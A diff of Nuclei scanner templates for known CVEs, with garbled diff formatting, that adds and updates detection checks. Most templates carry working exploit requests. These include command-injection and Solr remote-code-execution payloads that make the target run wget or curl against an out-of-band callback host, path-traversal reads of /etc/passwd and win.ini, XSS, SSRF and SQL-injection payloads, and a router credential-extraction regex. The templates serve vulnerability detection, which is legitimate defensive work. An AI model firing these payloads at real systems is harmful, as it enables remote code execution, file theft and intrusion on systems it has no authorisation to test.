POST /en/php/usb_sync.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: curl/7.58.0
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
&act=sync&task_number=1;wget http://{{interactsh-url}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2018-14013
|
||||
|
||||
info:
|
||||
name: Zimbra XSS
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013
|
||||
tags: cve,cve2018,xss,zimbra
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2018-15517
|
||||
|
||||
info:
|
||||
name: D-LINK Central WifiManager - SSRF
|
||||
description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
|
||||
reference:
|
||||
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
|
||||
author: gy741
|
||||
severity: medium
|
||||
tags: cve,cve2018,dlink,ssrf,oob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2018-15745
|
||||
|
||||
info:
|
||||
name: Argus Surveillance DVR - Directory Traversal
|
||||
author: gy741
|
||||
severity: high
|
||||
description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
|
||||
reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
|
||||
tags: cve,cve2018,argussurveillance,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "for 16-bit app support"
|
||||
- "[drivers]"
|
||||
condition: and
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2018-16167
|
||||
|
||||
info:
|
||||
name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/49918
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16167
|
||||
tags: cve,cve2018,logontracer,rce,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /upload HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: python-requests/2.18.4
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2018-16288
|
||||
|
||||
info:
|
||||
name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/45440
|
||||
- https://www.cvedetails.com/cve/CVE-2018-16288
|
||||
tags: cve,cve2018,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2018-19458
|
||||
|
||||
info:
|
||||
name: PHP Proxy 3.0.3 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/45780
|
||||
- https://www.cvedetails.com/cve/CVE-2018-19458
|
||||
tags: cve,cve2018,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?q=file:///etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2018-20470
|
||||
|
||||
info:
|
||||
name: Sahi pro 7.x/8.x - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
|
||||
reference: |
|
||||
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
|
||||
- https://www.cvedetails.com/cve/CVE-2018-20470
|
||||
tags: cve,cve2018,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
part: body
|
|
@ -18,7 +18,7 @@ requests:
|
|||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2018-5233
|
||||
|
||||
info:
|
||||
name: Grav CMS before 1.3.0 allows XSS.
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: |
|
||||
Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233
|
||||
tags: cve,cve2018,xss,grav
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2019-0193
|
||||
|
||||
info:
|
||||
name: Apache Solr - DataImportHandler RCE
|
||||
description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
|
||||
author: pdteam
|
||||
severity: critical
|
||||
refrense: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
|
||||
- https://paper.seebug.org/1009/
|
||||
tags: cve,cve2019,apache,rce,solr,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /solr/admin/cores?wt=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Language: en
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-type: application/x-www-form-urlencoded
|
||||
X-Requested-With: XMLHttpRequest
|
||||
|
||||
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -7,6 +7,7 @@ info:
|
|||
reference:
|
||||
- https://seclists.org/fulldisclosure/2019/May/50
|
||||
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
|
||||
- https://www.exploit-db.com/exploits/50119
|
||||
description: |
|
||||
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
|
||||
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
|
||||
|
@ -18,6 +19,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
|
||||
- "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2019-12276
|
||||
|
||||
info:
|
||||
name: GrandNode 4.40 - Path Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
|
||||
reference: |
|
||||
- https://security401.com/grandnode-path-traversal/
|
||||
- https://www.cvedetails.com/cve/CVE-2019-12276
|
||||
tags: cve,cve2019,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
|
||||
headers:
|
||||
Connection: close
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: CVE-2019-12616
|
|||
|
||||
info:
|
||||
name: phpMyAdmin CSRF
|
||||
author: Mohammedsaneem
|
||||
author: Mohammedsaneem,philippedelteil
|
||||
description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
|
||||
severity: medium
|
||||
tags: cve,cve2019,phpmyadmin,csrf
|
||||
|
@ -18,12 +18,18 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "4.6.6deb4+deb9u2"
|
||||
- "phpmyadmin.net"
|
||||
- "phpMyAdmin"
|
||||
condition: and
|
||||
condition: or
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- 'v=[1-4]\.[0-8]\.' # Fix in 4.9.0
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 401 #password protected
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2019-16313
|
||||
|
||||
info:
|
||||
name: ifw8 Router ROM v4.31 allows credential disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: ifw8 Router ROM v4.31 allows credential disclosure by reading the action/usermanager.htm HTML source code.
|
||||
reference: |
|
||||
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-16313
|
||||
tags: cve,cve2019,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/action/usermanager.htm'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'user'
|
||||
- 'pwd'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'
|
|
@ -5,7 +5,9 @@ info:
|
|||
author: daffainfo
|
||||
severity: medium
|
||||
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
|
||||
reference: |
|
||||
- https://plugins.trac.wordpress.org/changeset/2152730
|
||||
- https://wordpress.org/plugins/api-bearer-auth/#developers
|
||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
author: pikpikcu,madrobot
|
||||
severity: critical
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||
tags: cve,cve2019,apache,rce,solr
|
||||
tags: cve,cve2019,apache,rce,solr,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -15,15 +15,10 @@ requests:
|
|||
Connection: close
|
||||
|
||||
- |
|
||||
POST /solr/{{collection}}/config HTTP/1.1
|
||||
POST /solr/{{core}}/config HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Connection: close
|
||||
Content-Type: application/json
|
||||
Content-Length: 259
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
{
|
||||
"update-queryresponsewriter": {
|
||||
|
@ -37,25 +32,25 @@ requests:
|
|||
}
|
||||
|
||||
- |
|
||||
GET /solr/{{collection}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
|
||||
GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '"status"\:\{"(.*?)"\:\{"name"'
|
||||
name: collection
|
||||
group: 1
|
||||
internal: true
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Non-authoritative answer"
|
||||
- "example.com"
|
||||
condition: and
|
||||
name: core
|
||||
group: 1
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
|
||||
- "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -3,8 +3,10 @@ id: CVE-2019-3401
|
|||
info:
|
||||
name: Atlassian JIRA Information Exposure (CVE-2019-3401)
|
||||
author: TechbrunchFR,milo2012
|
||||
description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
|
||||
severity: info
|
||||
tags: cve,cve2019,jira,atlassian
|
||||
reference: https://jira.atlassian.com/browse/JRASERVER-69244
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -8,17 +8,23 @@ info:
|
|||
reference:
|
||||
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
|
||||
- https://jira.atlassian.com/browse/JRASERVER-69793
|
||||
tags: cve,cve2019,atlassian,jira,ssrf
|
||||
- https://hackerone.com/reports/713900
|
||||
tags: cve,cve2019,atlassian,jira,ssrf,oob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
|
||||
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
|
||||
|
||||
body: |
|
||||
url=https://{{Hostname}}:443@{{interactsh-url}}
|
||||
|
||||
headers:
|
||||
X-Atlassian-token: no-check
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
name: ssrf-response-body
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- '<p>This domain is for use in illustrative examples in documents.'
|
||||
part: body
|
||||
- "http" # Confirms the HTTP Interaction
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2019-9618
|
||||
|
||||
info:
|
||||
name: GraceMedia Media Player 1.0 - Local File Inclusion
|
||||
author: 0x_Akoko
|
||||
severity: critical
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/46537
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
|
||||
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -3,7 +3,7 @@ id: CVE-2020-13927
|
|||
info:
|
||||
name: Unauthenticated Airflow Experimental REST API
|
||||
author: pdteam
|
||||
severity: medium
|
||||
severity: critical
|
||||
tags: cve,cve2020,apache,airflow,unauth
|
||||
|
||||
requests:
|
||||
|
|
|
@ -17,6 +17,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
@ -26,3 +27,6 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- 'Index of'
|
||||
- 'wp-content/uploads/wp-file-manager-pro/fm_backup'
|
||||
- 'backup_'
|
||||
condition: and
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2020-25223
|
||||
|
||||
info:
|
||||
name: Sophos UTM - Preauth RCE
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
|
||||
reference: |
|
||||
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
|
||||
tags: cve,cve2020,sophos,rce,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /var HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: text/javascript, text/html, application/xml, text/xml, */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
X-Requested-With: XMLHttpRequest
|
||||
X-Prototype-Version: 1.5.1.1
|
||||
Content-type: application/json; charset=UTF-8
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
Referer: {{BaseURL}}
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
|
||||
{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2020-27361
|
||||
|
||||
info:
|
||||
name: Akkadian Provisioning Manager - Files Listing
|
||||
author: gy741
|
||||
severity: high
|
||||
description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories.
|
||||
reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/
|
||||
tags: cve,cve2020,akkadian,listing,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/pme/media/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Index of /pme/media"
|
||||
- "Parent Directory"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -26,5 +26,11 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- '^= ([0-4]\.[0-9\.]+|5\.[0-2]|5\.[0-2]\.[0-9]+|5\.3\.[0-1]) ='
|
||||
- '^== Changelog =="'
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- '^= (5\.3\.[2-9]+|5\.[4-9]+\.|[6-9]\.[0-9]+\.[0-9]+|1[0-9]+\.) ='
|
||||
negative: true
|
||||
part: body
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2020-35598
|
||||
|
||||
info:
|
||||
name: Advanced Comment System 1.0 - Path Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/49343
|
||||
- https://www.cvedetails.com/cve/CVE-2020-35598
|
||||
tags: cve,cve2020,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2020-6637
|
||||
|
||||
info:
|
||||
name: OpenSIS v7.3 unauthenticated SQL injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
|
||||
tags: cve,cve2020,sqli,opensis
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-6637
|
||||
- https://cinzinga.com/CVE-2020-6637/
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/account/index.php'
|
||||
- '{{BaseURL}}/opensis/index.php'
|
||||
- '{{BaseURL}}/index.php'
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'SQL STATEMENT:'
|
||||
- "<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"
|
||||
condition: and
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2020-7796
|
||||
|
||||
info:
|
||||
name: Zimbra Collaboration Suite (ZCS) - SSRF
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
|
||||
reference: |
|
||||
- https://www.adminxe.com/2183.html
|
||||
tags: cve,cve2020,zimbra,ssrf,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
